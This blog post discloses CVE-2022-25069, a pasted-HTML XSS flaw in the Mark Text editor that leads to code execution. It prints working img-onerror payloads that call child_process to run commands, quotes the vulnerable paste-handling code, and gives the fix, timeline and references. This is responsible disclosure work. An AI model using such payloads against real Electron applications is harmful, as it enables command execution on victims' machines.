본문 바로가기
보안/CVEs

CVE-2022-25069: Mark text : Remote code execution through pasting content

by luiseok 2022. 3. 15.

About

Mark text (https://marktext.app/) is a markdown editor built with electron.js and vue.js v2.6.14. I've discovered containing a DOM-based cross-scripting (XSS) vulnerability that allows attackers to perform remote code execution via pasting a crafted payload from a clipboard.

Details

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above HTML is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.

 ContentState.prototype.checkCopyType = function (html, text) { 
   let type = 'normal' 
   if (!html && text) { 
     type = 'copyAsMarkdown' 
     const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim()) 
     if (match && match[1]) { 
       const tag = match[1] 
       if (tag === 'table' && match.length === 3 && match[2] === 'table') { 
         // Try to import a single table 
         const tmp = document.createElement('table') 
         tmp.innerHTML = text 
         if (tmp.childElementCount === 1) { 
           return 'htmlToMd' 
         } 
       } 
  
       // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX. 
       type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type 
     } 
   } 
   return type 
 }

 

 

GitHub - marktext/marktext: 📝A simple and elegant markdown editor, available for Linux, macOS and Windows.

📝A simple and elegant markdown editor, available for Linux, macOS and Windows. - GitHub - marktext/marktext: 📝A simple and elegant markdown editor, available for Linux, macOS and Windows.

github.com

As you can check from the code, there was only a Regular expression that checks if the pasted text is an HTML, and is a <table> tag or not.

 

So that was a weak point. It must have been checked or sanitized before pasting the text. But it did not.

As a result, the attacker was able to take full control of the victim's computer.

Example

동영상 서비스가 종료되어 해당 콘텐츠를 재생할 수 없습니다.

동영상 서비스가 종료되어 해당 콘텐츠를 재생할 수 없습니다.

Solution

This issue should be fixed by adding child element's sanitizing process.

Timeline

2022-02-08 Vulnerability found and the issue was registered to Marktext's Github

2022-02-10 Problem fixed, requested for CVE ID

2022-03-05 CVE ID issued (CVE-2022-25069)

References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-25069
  2. https://github.com/marktext/marktext/issues/2990
  3. https://github.com/marktext/marktext/pull/3002 

 

Footnote

This was my first experience finding open source vulnerability and issuing CVE ID. It was really thrilling and I felt a lot of accomplishment.
I would like to express my gratitude to Oscar for giving this experience as much courage as possible.​

저작자표시 비영리 동일조건 (새창열림)

티스토리툴바